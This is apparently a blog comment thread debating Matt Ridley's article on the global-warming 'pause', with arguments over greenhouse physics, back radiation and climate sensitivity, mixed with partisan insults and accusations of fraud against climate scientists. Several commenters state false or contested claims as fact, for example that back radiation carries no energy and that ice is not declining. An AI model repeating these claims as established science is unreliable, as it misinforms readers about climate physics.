but the simple linearized argument for positive feedback from water vapor makes little sense given the empirical lack of a irreversible runaway warming triggered by any particularly warm year. A random walk cannot stabilize it — there must be net negative feedback for long term stability. But to argue that there is no greenhouse effect at all, or even that there is no marginal warming at all from increased CO_2 — that’s just crazy talk. The latter is just barely possible, but if it is true it would be due to some truly crazy internal multivariate nonlinearities in the system that cannot be described at all in linearized terms. My credentials — in case you want to throw back a no true scotsman argument or impugn my knowledge of physics — I’m a physics Ph.D., currently teaching intermediate electrodynamics to physics majors (with a bunch of grad students sitting in) and introductory mechanics and introductory E&M to undergraduate life science and engineering students respectively, and have written my own physics textbooks after having taught physics at all levels (and done research in theoretical physics in various subjects) since roughly 1977. That doesn’t mean that I’m right, of course — that would be a logical fallacy — but it damn skippy means that I’m a lot more likely to be right than nearly anyone you are likely to ever meet and if nothing else you ought to take what I say above very seriously and not reply with some trivially mistaken argument. The skeptical argument against catastrophic anthropogenic global warming is not helped politically by individuals who assert that there is no such thing as the greenhouse effect or that laws of thermodynamics are violated by “back radiation”, etc. That’s sheer nonsense — they are no such thing — and besides, it is absolutely bone simple to go outside and measure downwelling thermal radiation from the atmosphere, any night of the week. This downwelling radiation would be absent if there were no atmosphere, right? This downwelling radiation is part of the energy flow budget of the surface. The surface is going to radiatively cool faster with no atmosphere than it is going to cool with one that absorbs its outgoing radiation and re-radiates part of it back. It really is as simple as that. rgb You cannot claim there is zero CO2-AGW unless you cover all possible control systems in the atmosphere. And climate Alchemy has made so many mistakes in the physics, there is no chance of that. Re: ‘downwelling radiation’, a pyrgeometer measures the apparent temperature. This is then converted by the S-B equation to the notional emittance (aka exitance) of the atmosphere in the view angle of the instrument. That view angle is set by two parts of the apparatus; the box which shields the back of the detector from the emittance of the emitters in the opposite direction and the hole in the front. Have back to back pyrgeometers in the atmosphere and with no temperature gradient, the net signal is zero. This is because it is the vector sum of emittances. Therefore the only IR heat transfer at any plane in the atmosphere, including the surface plane, is the difference of opposing emittances. In other words, ‘ downwelling radiation’ for equal surface and local atmosphere temperatures transfers zero energy. To claim otherwise is to participate in the biggest scientific cock up in history. Put it another way, just because a pyrgeometer is calibrated in W/m^2, the potential energy flux of the emitter(s) in its view angle to a sink at absolute zero, doesn’t mean it’s real. Only part of it can be real if it is from a body with a higher net emittance in the overlapping wavelengths than the radiation sink. This is Radiative Physics 101, proven by experiment. No-one has ever proved that back radiation is real, defined as doing it by calorimetry. “The surface is going to radiatively cool faster with no atmosphere than it is going to cool with one that absorbs its outgoing radiation and re-radiates part of it back. It really is as simple as that.” TRUE, but Climate Alchemy has completely failed to understand why! More at another time! Here goes a risk of asking a couple of dumb questions. But first I should point out I understand the insulating nature of the atmosphere and that if the insulation effect is increased (i.e. with more CO2), then (all other things being equal) the surface temperature of the earth will most likely increase. So, first, how much of a temperature increase would the changes in CO2 levels (since, say 1900) account for, purely on the basis of the increased insulating effect of the increased CO2? Second, what effect would those same CO2 increases have on insulating the earth from the sun’s warming? (Clearly, insulation works both ways, except whilst the earth may warm, the sun most surely will not). In other words, which has the bigger effect? Third, are the above insulating effects consistent with the majority of the GCMs? Sorry to drag this back to basics, but I sometimes wonder if we don’t lose sight of the forest while we debate about the trees. I’m not referring to the device of which you speak. I’m talking about spectrographs taken of the atmosphere, looking up. These show nothing like the thermalized radiation you are talking about. They show the actual spectrum being radiated by the greenhouse gases in particular. Top of atmosphere spectrographs, looking down, show matching/inverted patterns where the GHGs have taken a “bite” out of high temperature surface emissions and replaced them with much cooler emissions at a temperature that corresponds to the height at which the atmosphere starts to be transparent to radiation in those bands. Taken together, they aren’t just convincing, they are a slam dunk. I have no idea — really — what you mean when you talk about the vector sum of emittances. Are you trying to refer to the Poynting vector? The flux of the Poynting vector through some particular surface? I also don’t understand your point when you say: I really think that you need to take a look at the energy flow in the single layer model. It’s really pretty simply, especially if you consider a perfect absorber layer and pure Stefan-Boltzmann. It’s less simple for a more realistic model like that which Petty presents and discusses in Chapter 6 of his book, but it is hardly a “cock up”, and in both cases the ground layer has to reject the sum of the external heat source (which is much hotter, e.g. the Sun) and the back radiation. Part of this outgoing radiation does indeed get absorbed by the absorber at the same rate that the absorber returns it, but that doesn’t stop the ground from having to warm up to maintain a total outward directed flow of energy equal to the sum of the solar heating and the back radiation. In other words, even though in detailed balance, of course the net flow between the atmosphere and ground is zero, the ground is still stuck warming enough to reject BOTH the energy that it bounces back and forth between it and the atmosphere and the energy it receives from the sun and ultimately has to lose to space. This is really obvious with the single layer model, where the Earth receives heat at rate (sun plus back radiation), it radiates heat at the rate (otherwise it isn’t in balance, it is warming or cooling), the surrounding shell receives radiation at rate (perfect absorber) and radiates outward (so the whole system is in balance) and back inward, completing the the model so that it is consistent. Total flow in is , from the sun only. Total flow out is , radiated into the outward direction from the absorber layer only. But the temperature the Earth has to be to radiate for any nonzero is strictly greater than the temperature it would have if were zero, that is, if there were no atmosphere/absorptive layer interpolated between it and some presumed absolute zero surrounding absorber (where 3 K is an excellent approximation). In this model, of course, the interpolating shell (if it has roughly the same radius as the Earth, only a bit larger) acquires the temperature the Earth would have had if there were no layer, as it has to radiate outward, just like the Earth would have had to do. In the atmosphere, it isn’t a perfect absorber, it isn’t a perfect conductor perfectly insulated from the Earth’s surface, there is convection etc, and the entire atmosphere has a lapse rate. However, the back radiation in the coupled channel at the surface equilibrium temperature basically ensures that the surface does not cool from radiation emitted in this channel (or band — the comparatively narrow range of frequencies where e.g. CO_2 is a strong absorber). Again, the surface has to be warmer to reject enough heat through the unblocked part of the spectrum at its blackbody temperature. I’m sure we can make up some lovely stories about somebody receiving basketballs from their coach at the rate of one every five seconds and having to pass them to someone at the other end of the court before the next one arrives. Part of the drill is run with no opposition, and it is pretty easy — the player catches the ball and throws it, preventing balls from building up in his end of the court. Then an opposing player gets in the way. One ball in five the opposition intercepts the ball and immediately passes it back. Now the player has to throw six balls every twenty five seconds instead of five, and has to work harder and gets hotter even though hey, there is no net transfer of basketballs between him and the opposition and balls never build up in his hands or the hands of the opposition. It doesn’t even matter if the opposition returns all of the balls to the player. They could return every other ball to the player, and throw the other on down the court themselves (a better metaphor). The player still has to throw more balls per second when there is opposition than when there isn’t even if the opposition doesn’t ever accumulate balls and hence hold more balls than the player. Obviously, the rate at which the Earth throws these “balls” is proportional to . That’s why the temperature goes up in a way related to the rate at which the atmosphere returns part of the radiation, even though in the end there isn’t necessarily any net transfer of radiation in the blocked channel. rgb Answer to John H. For the present Earth’s atmosphere there is zero CO2-AGW. The GHE is set by clouds and ice. Ice ages are the result of a change in cloud albedo as biofeedback changes, mostly phytoplankton, but this requires a thermohaline circulation. If there is no thermohaline circulation, caused by no ice caps, you get another 10 K or so mean temperature rise, the other stable atmosphere mode. RGB Is correct. Using a standard infrared thermometer like I have and used by many technicians use in the HVAC industry, the downwelling radiation (AKA “back radiation”) can be easily observed. In clear skies the observed temperature is not correct because the atmosphere greenhouse gases do not radiate over the full spectrum of a black body. But clouds do, and one can even estimate their altitude by their temperature difference with the surface and an assumed approximate lapse rate. The thermometer is observing and receiving radiation from a colder area. If it is pointed at a wall in a room at the same temperature of the device, it will correctly read the temperature even though the net heat transfer is zero. According to the Stefan-Boltzmann law radiation, a body emits radiation proportional to T^4. It does not look around for a warmer body and stop radiating if it finds one. I noticed the equations in one of the ASHRAE handbooks (American Society of Heating, Refrigerating and Air-Conditioning Engineers) when estimating heat loss and transfer in a room include (among other things) calculation of the radiation of all the surfaces, walls and windows in the room, even the cold ones. These are practical people who make a living by being right most of the time. When the content of a greenhouse gas increases, the effective photon escape to the surface altitude drops to a lower and warmer level which increases the downwelling radiation and reduces the net heat leaving the surface, forcing it to warm. Knowing the increase in radiation from spectral tools such SpectralCalc or Modtran, my three level global energy balance model can estimate the surface temperature change. () Thank you.. that’s all I can say. That 238.5 watts/m^2 was made when co2 levels were 370 – 380 ppm. I wonder what the new rates would be based on a 400 ppm of co2. Gravy trains are difficult to stop. The climate apparatchiks in the various government institutions, politicians milking the renewable subsidies and the attacks by environmentalists, will make sure the AGW meme continues for some time to come. Let’s face it, if you are desparate enough to pretend to be a Nobel laureate, there will be nothing you will not stoop to. “It has been roughly two decades since there was a trend in temperature significantly different from zero” And the powers that be that hand out taxpayer’s monies need to amplify this every time there is another handout demanded. In reality, as the Pause continues unabated, plus more and more blackouts occur in parts of the western world during winter due to over-reliance on renewables, so the funding for ‘climate science’ will contract. A smart ‘climate scientist’ will conclude that it is now time to come clean and say it as it really is, that way there may be a chance of surviving the inevitable cull of pseudo-scientists spouting the official alarmist line. I have to admit that the thought of an army of unemployed ‘climate scientists’ gives me a warm, fuzzy feeling. Unfortunately, these clowns will never be prosecuted for economic crimes against humanity. Obviously there are not many “smart climate scientists” willing to kill the cash cow. I feel sorry for some who know the truth, but need to lie to keep their jobs. What a degradation from the principles that likely were held when they first entered this profession . It is good to see a lukewarmer admitting he may be exaggerating a climate sensitivity of even 1 degree C. Good on you Matt Ridley. Take note Lord Monckton and Nigel Lawson also. Not paywalled here: This is a real problem for the scaremongers – there is no obvious replacement. In a few years biotech or nano tech will be producing scare stories, but for now its looking increasingly likely there will be a hiatus in funding.. Poor old Nylo! He must be on the g$avy t$ain! Amazing how some people can forecast the weather in 15 years time! @George Lawson, only profets forecast the weather (and they often miss). I was only talking about global average temperatures, not weather. And rather than forecasting, I was extrapolating observed past cyclical behaviour. The only implicit assumption is that everything will behave as it always has, but yes, it is a rather strong assumption. That’s why I only said “likely”, which in IPCC language just means 67% certainty. Heh, pretty standard skepticism by Nylo, were there such a thing. The question is whether or not the recovery from the LIA continues or not. Since that recovery is a millennial scale phenomenon, presently not understood, we must be agnostic. Not terribly cool to knee-jerk over ‘global warming will start again afterwards’. We don’t really know, now, do we? ================ You must hone your climate sensibility, heh. ============= Dang, ‘refine’ instead of ‘hone’. =========== (I meant, only profets forecast the weather THAT FAR into the future). Nylo……. prophets not profets. All the CAGW scammers are making profits. ;^D While the theoretical, laboratory “climate sensitivity” of doubling CO2 from 280 to 560 ppm in dry air might be a gain of 1.2 degrees C near earth’s surface, it’s quite possible IMO that the effective “equilibrium CS” of such an increase in the actual atmosphere could be around zero degrees C, thanks to negative water vapor, cloud and other feedbacks. Climatology is still in its infancy and valuable research resources have been wasted on meaningless, GIGO models, when what has been and still is needed are more and better observational data. It’s called “Le Chatelier’s Principle” in basic chemistry–any change in concentrations of a chemical system will produce feedbacks that partially counteract that change. Example: add CO2 to the atmosphere, whether by ocean outgassing, by fossil fuels, or by killing soil organisms–will produce negative feedbacks, such as increased plant growth to absorb the carbon dioxide, ocean absorption, etc. One key is offset–the feedback must be negative. The other key is partial–the change is not reduced to zero. The third is “equilibrium”. That is, you meant “equilibrium concentration” in a chemical system. The earth’s climate system is in a less well-defined state of free energy balance than a chemical equilibrium, because it is an open, nonlinear, chaotic, multivariate system. It therefore can violate this principle. However, there are good reasons in the theory of nonlinear chaotic multivariate systems to think that it does not — in particular the long term quasi-stability of the climate system. This is precisely why I am puzzled when climate scientists assert strong positive feedback from water vapor. That isn’t the default assumption by any means. Indeed, it is the least likely assumption, one that would need to be carefully and extensively proven. Positive water vapor feedback at equilibrium violates the concept of stability — it is difficult to explain how the feedback could be positive and yet the system is nevertheless stable. rgb Thanks for your well-reasoned, rational and competent comments unlike the fanatical, histerical and histrionic venom spewing forth from RACook1978. Yours is the type of useful information that can lead climate scientists to reconsider their assumptions and tune their models accordingly. This should be an on-going process as more climate data comes online, and I am sure that it is. I’m puzzled. How do you arrive at the number “15 years”? By consulting a Ouija board? Your local gypsy? Tarot? What exactly does the word “likely” mean in this assertion? How does the ocean “modulate” the warming induced by increased GHGs, and how exactly are you solving the coupled Navier-Stokes equations (including all latent heat terms and integration over all of the wavelengths involved across all of the line absorptivities involved, accounting fully for things like precession, obliquity, eccentricity, solar variability, the unpredictability of decadal oscillations and volcanic activity) that actually describe this process? I mean Jeeze, you take a problem that is (apparently) not accurately computable by smart people working very hard with the world’s largest computers and you solve it in your head and make a positive pronouncement with an air of absolute certainty. Why not just say that we have no bloody idea what the climate will “likely” do over the next 15 years because we utterly lack a predictive understanding of the underlying dynamics on any sort of macroscopic scale with any sort of demonstrated predictive skill and the microscopic dynamics is not computable. Why use the word “likely” at all? How likely? How would you compute likelihood? I know that what you mean to say is that you think it plausible that the ocean is — somehow — preventing CO_2 from warming the planet as much as it is supposed to according to the models, and that you think it probable that such warming as we have seen in recent years was from natural causes, interpreted as “warming that would have occurred anyway, maybe, even without CO_2”. But if you are going to be that specific — 15 years — support the assertion, please, with something more than “I think that”. I’m betting that you will invoke the PDO and the apparent periodicity in the temperature record from the last 150 years. Then explain why that pattern — that does not persist into the past earlier than 150 years ago (and fails absurdly to describe 500, 1000, 2000 years) “should” persist for the next 15 years, or 50 years, or 500 years. In fact, explain that “pattern” at all. Not as a fit to a model, but in terms of computable physics. rgb Meh, 15 years is a pretty good guess by a lot of people and it has to do with the end of the concatenation of the cooling phases of the oceanic oscillations. That is not to say that there is anything wrong with your critique. I’m a little amused that Nylo has been so attacked for what is fundamentally a reasonable skeptical speculation. =================== Let me put it this way. If the temperature starts back up in 15 years, it will be Right On Time, and if the rise is at the same slope as the last three times, it will again demonstrate, for the second time, that AnthroCO2 has little effect, ie, a demonstration of low climate sensitivity. It’s one we’ve seen already, in the last quarter of the last century. ==================== I think Nylo’s assumptions are reasonable. That’s about the way I’m thinking, and straight off the bat I’d say it’s linked to the PDO “phenomenon”. And I call it that because I haven’t a clue what actually causes it. Nobody does. In fact I’d go further and say if we only got the underlying cause of it out of this climate debacle, it will have gone some way to nearly being worth it. I don’t think it is the shifting of a body of heat from one zone to another, rather it is whatever is causing that body of heat to shift is also doing subtle things to the rest of the climate that results in very roughly thirty year warm-cool cycles, and because some other phenomena has us in a longer term warming cycle, the warm periods warm more than the cool periods cool. Trends always break down eventually, but given that we are, millenially speaking, in a very benign state at present, I think it’s safer to assume that temperatures will continue moving down slowly, and that it will likely last 15 or so years. This century we will have two cooling cycles and one warming one, so temps will be at or around the peak in 1998 by the end. That’s my hunch, based on an aggregation of all I’ve learnt here. And hunch’s are all well and good, as long as they aren’t presented as science to either politicians or the public so they can vote on them under the impression that they are voting on the basis of a scientifically known fact. Indeed, the word “hunch” is about perfect. It implies intuition and the continuation of a possible pattern, without trying to argue that the pattern has any known reason to continue because we cannot really establish why it has held in the recent past where it has held but no further back (as far as we can tell). Overall, hunch’s are bets that the future will be like the past, and (autocorrelation in physical processes being what it is) sometimes that’s a good bet. Other times (autocorrelation being what it is in chaotic nonlinear systems, physical or not) it isn’t. Today is a day I’d have lost the standard “hunch” bet that the weather today is like the weather yesterday. I’d have lost it yesterday as well. However, it looks like a good bet for the next three or four days (according to much more sophisticated forecasting models). Five or six or seven days out, even the sophisticated forecasting models are reduced to the weather this year is likely to be like the weather was last year — or better yet an average over a decade of years. And nobody has any idea what the weather will be like the next decade, because it is no better than even odds that it will be like the weather was last decade, and less than even odds like the decade before. Based, of course, on the ill-defined notion that the past, statistically speaking, is a decent predictor of the future. rgb. I think you are exactly right. If you look at the temperature anomaly chart and attempt to correct for the PD0, the temperature curve looks different. Remove .4 degrees for each of the cycles and you get something that looks like a temp rise of .3 degrees from 1910 to 1945, then .3 degrees from 1945 to 1975, then .2 degrees from 1975 to 1998. The PDO is now in a cooling phase and effectively canceling any rise in temp from C02. It appears that the sensitivity to C02 is dropping. So I am of the opinion that in about 60 years, we will find our temperatures at .5 degrees hotter. That’s my WAG. All rationalization, nothing empirical. Once more for the collection… Where’s global warming? By Jeff Jacoby, Globe Columnist | March 8, 2009 What happened to global warming? By Paul Hudson, BBC | October 9, 2009 Whatever Happened to Global Warming? Matt Ridley, WSJ | September 4, 2014 Here’s the Conversation finally acknowledging “the pause” in a begrudgingly written perfunctory piece: The alarmists at The Con collectively refused to acknowledge “the pause” …. hence why there are no comments! ☺ And that is why “Global Warming” was changed to “Climate Change”. Everyone understood what Global Warming meant/was, so when it wasn’t happening, there was a problem for the CAGW crowd. However, Climate Change can easily be blurred into the everyday changing weather. In this context, there will never be a “pause” in Climate Change. And so it goes. There is no alternative political narrative to “climate change” so it will live on, no matter how scientifically unsound. It was never about science anyway. The fact is that the political “left” has nothing better to push and neither has the “right”. We’re locked and inertia means the establishment will remain “liberal” even when the meaning of the word liberal is a literal mystery to those that claim to be so. It is all so interesting – but we don’t really know anything for certain. We little humans can utter no trustworthy opinions about how the chaotic manifestations of the world climate will develop in our time. Just wait – I will tell you all about it in 500 years’ time! But at least the IPCC should come down from their hubris-ridden horse of sublime knowing-it-all. That attitude is all they have, so admitting that they really know nothing would mean they would have to fold their tents and move on…..never going to happen! Like a bad tenant, they will need to be evicted. Advancing insight in a settled science. Next they want a debate! *keeps on dreaming* And back in 2012, the UK Met Office resonded to David Rose’s article, pointing out the standstill.. The evidence of the past 26/19/16 years is that there is some self regulation going on somewhere in the form of negative feed back. Instead of trying to explain this the scientists are finding more positive feedbacks to make it seem “it’s worse than we thought.” A new study seems to suggest the soil is the source of yet more positive feedback. I’m not sure where this is being manifested but if it is a real effect it is being masked by other processes of hiding the heat, it not being there, or other negative feedbacks that are not apparent and don’t attract research resources. The arrogance of policymakers (and I think it is a qualification for the job) is that they can control the climate. I have been castigated by a scientist for using the control knob analogy as it being over simplistic. I suggested he communicate that with the policy makers as that is certainly how they view it. I was told that what policy makers wish to believe is not the business of scientists…so if governments was to interpret information wrongly or pick information that reinforces their agenda, the scientists will let them. More than that they will incentivise the finding of reinforcing information. Aa turnaround is starting. Increasingly science is distancing itself from policy decisions. It cannot directly upset government. The teat still has milk. Stand by, when democratic process says “enough of this” for the scientists to point at their papers and say “we were misunderstood/misrepresented”. We don’t make policy. No of course not. But you stood by and allowed your findings to be misrepresented it the media without screaming in return for 5 minutes of fame. It really is worse than we thought. Sooner or later, the science will acknowledge reality, the scare has been exaggerated. ================ Look in the mirror. Too many of you alarmists deliberately conflate skepticism about catastrophe with skepticism of the basic science. You are transparent in your ignorance or disingenuousness. Why do you think that is good communication? ========================== Welcome to the Dark Side, Mr. Ridley. We’ve been expecting you. I’m shocked! What this layman acknowledges is the raw observational data and that which has been “homogenized” without bias, because “the science” is all over the damned place. Fact is that the claims of those that have been crying CAGW from the roof tops has been and is still being falsified by the data. In short those scientists and their disciples that failed to acknowledge the data for years now are not worth listening to because their “science” is just plain bad. And who exactly is Matt Ridley? Oh, I guess he thinks his background in zoology makes him a climate expert. Why not ask, why have we seen no temperature decreases in the last two decades (as we’ve seen oscillations during the 20th century)? Why is the last decade the warmest on record, warmer than the previous warmest the decade before? Why do the oceans continue to warm, and global ice levels keep dropping… and why does the WSJ continue its irresponsible journalism of printing only one-sided Opinion pieces? “And who exactly is Matt Ridley?” Made me laugh. He is a journalist writing something based on actual factual data. Apparently this is not a combination that meets your approval. LOL some more. Which easy question to debunk? There are several choices. Warmest decade? That easy…it was slight of hand. The 30’s likely were despite the “adjustments”. The oceans continue to warm? That is cyclical, if only poorly understood ,and “continue” is based on a very short temp record most likely adjusted as the land temp has been. Why is the global ice measurement dropping? It isn’t. And to discredit the writer because his science is peripheral to the central debate is the hubris of one who considers his specialty as, well more special than others. I believe climate and it constant change is best understood by a generalist, but best examined, within their scope by a specialist. As I recall Ridley was once in your camp….how do you like him now? Barry, Could you please pick a couple temp reconstruction curves and put in your extrapolation of exactly how you think the temp is going to go? Say 100k ya, 10k ya, 100 ya? My take is that we are STILL WARMING from the last interglacial, just like we have many times before, warmer oceans, more CO2. Ice levels at the poles will soon provide a tipping point. Your point is that recent high frequency, high resolution data points to the Holocene temperature trend to reverse? @Barry If indeed the WSJ “irresponsibly” only publishes one-sided opinion pieces, it is far from alone in this — the same applies to most other newspapers as well. There isn’t anything irresponsible about it, either — it is called freedom of the press. It is your responsibility, not theirs, to avail yourself with the balance of viewpoints you deem appropriate. Furthermore, whether Matt Ridley is a climate expert is not germane to the issue. Everybody with half a brain can compare the temperatures, which have not risen, to the climate models, which predicted otherwise, and conclude that the models have failed. It may take a climate expert to explain exactly why they have failed, but it does not take one to observe that they have failed. To use a simile: I’m not a car expert, but I’m perfectly able to conclude from observing my car making grinding noises and stalling that it is broken. I will then take it to a car expert to fix it. Should that car expert advise me that the car is indeed fine, I will go with my judgement, not his. Because, you know, I really want it fixed. This whole “you’re not an expert, so you can’t have an opinion” thing is a red herring. It’s popularity among the warmers shows their sore lack of common sense. Unfortunately, some folks here make the same mistake, against those alarmists with non-climate experience, such as Tim Flannery or David Suzuki. Barry pushes the old misleading claim about “warmest on record” as though that actually has some relevance. His “record period ” covers all of about 150 years an carefully ignores the obvious recent warm periods : we know that dozen of decades were warmer during both the Medieval Warm Period and the Roman Warm Period, during neither of which were significant numbers of SUVs driving around. So much for the ignorant “warmest on record” claim. Ice levels are not dropping any more than they have been in our historical past, if at all – the lack of sea level increases should convince anyone that this claim is bogus. And the oceans aren’t globally warming either. Shredding ignorant claims like Barry’s is just too easy…. Barry: “… and why does the WSJ continue its irresponsible journalism of printing only one-sided Opinion pieces?” ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Setting aside your other errors and lapses in logic, you are mistaken about the WSJ. They have at least one columnist who very frequently writes articles supporting climate alarmism and attacking skeptics. His name is Paul Farrell. Whatever made you assume otherwise? Okay, one more comment on your lack of logic. You attack a skeptic author as not being a ‘climate scientist.’ Do you also attack columnists who support climate alarmism who are not ‘climate scientists?’ “Global warming is caused by the desire for more tax money.” Governments should defund climate science leaving climate scientists to elicit funds door-to-door. Save the clock tower, er, planet! How much would you be willing to pay for their models and prognostications? How much would you pay to know the Arctic will be ice-free by 2014 and snowfall a rare and wondrous event? The WSJ published an article about a fact. Global warming has stopped. What is recorded in the oceans is less then 1/2 of predicted and somehow bypassed the first 700 meters, and below that the data error margins make any conclusion meaningless. So Peter, are you in denial of this? Why should a journal suppress the truth? Peter, Regardless of what you think of Murdoch Snr. and his propaganda network, you should try to address every argument on its merits, otherwise you are probably committing one kind of fallacy or another. Attacking the source of an argument, the publisher for example, is an ad hominem fallacy. Whatever happened to global warming? What’s your favorite excuse for the failure of the models? Reblogged this on I Didn't Ask To Be a Blog and commented: “It has been roughly two decades since there was a trend in temperature significantly different from zero. “ Most understand the science, as explained by alarmists is not robust. Most scientists understand it is wrong. No amount of obfuscation will force nature out of its self regulating ways. If climate was so easily and drastically controlled by one of its parameters, we would have long ago had a planet that would not support life. The question is, why did we not have runaway warming when CO2 was at much higher levels? The answer seems to be that like today, CO2 followed temperature with a substantial time lag, and the self regulating ability of natural variations easily overwhelm any climate effect caused by humans. No one has proven that warmer and more CO2 is not a beneficial thing today when it has always been that way in the past. Were it not for hubris we would not be having this debate. The reason the leaders of China, India, and Germany will not attend the meeting is that they, like the Democrats who now do not want to seen with the incompetent, incoherent, “lead from behind” Leader of the Flee World. ( That is not a spelling mistake. Mr Obama flees from responsibility, knowledge and transparency.) They understand that everything he touches turns into chaos and he will evade repercussions from the inevitable disastrous results of his actions or lack of actions. China and India want US money. Germany now sees that they need coal powered electricity. Who ever would have thought of that/? Their governments are in enough trouble. They don’t want to take a giant step down to Mr Obama’s level. end of rant. “We call it riding the gravy train” I should rewrite “Have a cigar” with witty global warming lyrics for a laugh. The U.N. will I’m sure create another cudgel since this one is off the rails. And all the ignorant Euros will swallow the next thing hook line and sinker too. Meanwhile Obama and the democratic party are still beating this dead horse. richardscourtney September 5, 2014 at 6:29 am Ian W You are spouting rubbish. Both CO2 and H2O are radiative greenhouse gases. It is a function of their molecular shapes. Richard So you are saying that water molecules in a water droplet or ice crystals behave just like a Co2 molecules when they are hit by infrared photons? Do they immediately re-emit that IR in the same way as CO2? What part of greenhouse “gas” do you not understand? Water vapor, in the gas phase, is a powerful IR absorber. In fact, it is a much stronger absorber across the IR spectrum than CO2 is. In the liquid phase, the spectrum is considerably distorted and there is a large broad absorption band due to hydrogen bonding. Experimentally, water is quite a nuisance when doing IR work. Samples must be throughly dried lest residual water swamps out the spectrum of your sample of interest. Also, humidity can cause problems with the spectrometers themselves, if left unchecked. You correctly note that water, with its high heat capacity and large phase change energies, moves large amounts of heat through the atmosphere via convection. But we note that these are quite separate processes. Not exactly separate, for they deal with the same energy, and that energy cannot multiply on its own. By this I mean that the ratio of how much the same energy is conducted vs radiated, vs. convected etc., varies depending on composition of atmospheric gases, W/L or Light spectrum, and the materials encountered including of course water or oceans. The Pause Is Because of Flaws In the Cause Good one……………… They won’t run out of catastrophes. The myth of overpopulation is still hangin’ in there. Probably there are many regular WUWT readers who buy into this idea of us White Westerners going over to all of the Dark Continents, with Paul Ehrlich and Bill Gates, so we can put birth control in the water, promote rampant abortion, and conduct secret and coercive sterilizations on women. The CAGW scam is practically the same, with all of the funded research, NGOs, the UN, and the Jesus-Complex All-Knowing Planet-Saving Good-For-Thee-But-Not-For-Me Marxists saving us from ourselves. Thanks, Matt Ridley. Sanity and common sense should return. The commentary is technically correct if you are focused on the temperature of air, which is just one part of the earth’s biosphere that is warming. Increased temperature can manifest itself in the air, in the surface waters of the ocean, or in deep ocean waters. Please look a bit more carefully into the literature before reaching this conclusion. Ocean currents, which undergo cycles that can last decades, determine to a large extent where increased heat builds up. The earth has been in a multi-decade period where ocean currents have resulted in heating of deep ocean water (below 300 m). The amount of heating corresponds well with what is predicted from climate models based on atmospheric CO2 increases. At some time in the future (known form experience with many past events), the circulation pattern will change and that water will be brought to the surface, at which time surface ocean and air temperatures likely will increase rapidly. Don’t take my comments as valid, and likewise, don’t take the comments of the others who have replied here as valid either. Instead, please take a look at a journal article published in Nature Climate Change (“Recent intensification of wind-driven circulation in the Pacific and the ongoing warming hiatus”) Volume 4, March 2014, pages 222-227. This article clearly explains the phenomenon that I have described. Then you will have a broader context of information on which to base your conclusions. Karl says, “The earth has been in a multi-decade period where ocean currents have resulted in heating of deep ocean water (below 300 m). The amount of heating corresponds well with what is predicted from climate models based on atmospheric CO2 increases.” Please but no. From 0 to 700 m virtually no warming within the error bars and less then one third of the CAGW models. From 700m plus, about 1/2 the warming predicted by the models. ( I guess for climate science this is damm good). Now pray tell me, assuming, and scientifically we are inside the error bars so should not assume, how is this fraction of a degree of warming in the deep oceans, with a turnover of about 1000 years, going to manifest as CAGW in the future? It is always helpful to step back and take a look at the big picture occasionally.. Incidentally this also helps explain the UHI effect (cities are like deserts in that they inhibit evaporation and convection). This also explains how the real greenhouse effect is because of sunlight penetrating the ocean’s surface. There is not one shred of evidence that the earth’s climate system works the way the models have it working. Not one shred of evidence the models are correct. Not one shred of evidence the modelers have a clue. Here’s what they have: CO2 is a greenhouse gas (true), atmospheric CO2 is increasing (also true), human emissions are causing the rise in atmospheric CO2 (mostly true), therefore the warming in the late 20th century was caused by CO2 (unproven, but likely somewhat true) and if human CO2 emissions continue, it will cause a climate cataclysm (pure speculation). This is what sprung out at me when they tried to offer any explanation for the pause. I have been relatedly told by fantasists at the Guardian (quoting SkS) that co2 was now the main driver of climate. I knew this was rubbish as the standstill was around a decade back then. Here is the main driver and control knob in action. “Global Temperature Update – No global warming for 17 years 11 months” I assume there are at this moment climatetistas out scouring the myths and fables, rumors and hints of other remotely possible disasters upon which to build an edifice of profitable hysteria and profit. The media naturally will do what it can and Mother Government will yet again energize it’s merry band of memoranda reading overpaid government louts, every last one counting his days to retirement. This is our opportunity to beat them to the punch. May I nominate global cooling as the bogeyman — once the world runs out of fossil fuel, CO2 will drop off a cliff, and there will be no way left open to us for preventing the sudden onset of the ice age. Therefore, to prevent this, we must cut down on fossil fuel use now, in order to save it for our grand children! We must store CO2 underground, so that we may release it to avert future disaster! WSJ has been publishing op-eds by Fred Singer for at least 20 years, so your history is incorrect and the implication of some sort of Murdoch coup is incorrect. So how do we the taxpayers that have been swindled of our dollars get out money back from the AGW crowd? Who do we sue or what recompense do we have?? Global warming is in recession right now…. The important comment from Ridley’s article: “leaders from China, India and Germany have already announced that they won’t attend the summit ” Things will begin to change as the financing spigot slowly shuts down. Nothing happened, but nothing was happening. Thanks. That’s a nice overview and update, especially for casual observers of the topic most susceptible to the policy scam underway. As we can all see from the above, the Science doesn’t appear to be entirely settled. Please explain what that has to do with the predictions versus observations made climate scientists regarding temperatures. Some of us will listen if you actually have something to say. Posts like the one you’ve just made, however, make you look like a crazy person. [To whom are you addressing your question? Those who claim CAGW will be catastrophic despite 18 years of data showing they are wrong? Or the writer/administrator of this blog? .mod] Moderator: The threading says he is replying to Peter… don’t worry, you’ll get used to it ;) Why is the US the sole party in charge? We have regulations in place. Put the pressure on Aisa to clean up their acts before we do anything more, sign any more Kyoto protocols. Yeah put some pressure on Asia; right after you’ve “isolated” Russia, good luck! “It has been roughly two decades since there was a trend in temperature significantly different from zero.” — The alarmists thought they had everything covered when they switched from “global warming” to “climate change” because the climate is always changing to some degree. They knew that either an upward or downward trend in temperature could be used to indicate a “change” in the climate. The last thing they expected was a long period of zero trend. That threw a monkey wrench into their plans that they didn’t count on. It’s really hard to alarm people about climate change when the climate refuses to change. .” — Clouds cool the world, Anthony, they don’t make it hotter. Plus ça change, plus c’est la même chose… @hengis:‘.’ Sorry, but ‘back radiation’ is not a real energy flux, merely a potential energy flux. The heating of the oceans is by SW energy from the Sun. The maximum SST is ~31 deg C when (exponential with temperature) evaporation kinetics dominate. IR emissivity becomes very small because most vibrational excitation is transferred to breaking hydrogen bonds and giving substantial kinetic energy to the freed water molecules. The public and state governments are very confused over the global warming/climate change issue, and reading these comments it’s no wonder. Some of you who have commented are experts in some field, at least academically, but you present diametrically opposed interpretations of what’s going on with GW/CC. In short, you don’t know what you are talking about and you are confused too. I believe there is obvious bias in scientists along political ideaologies, and it shows here. If this article was. You have committed two more logical fallacies, the “Straw Man” and the “Red Herring.” I did not claim that millions of people around the earth are in great danger from the effects of GW/CC, yet that is the argument you attacked. 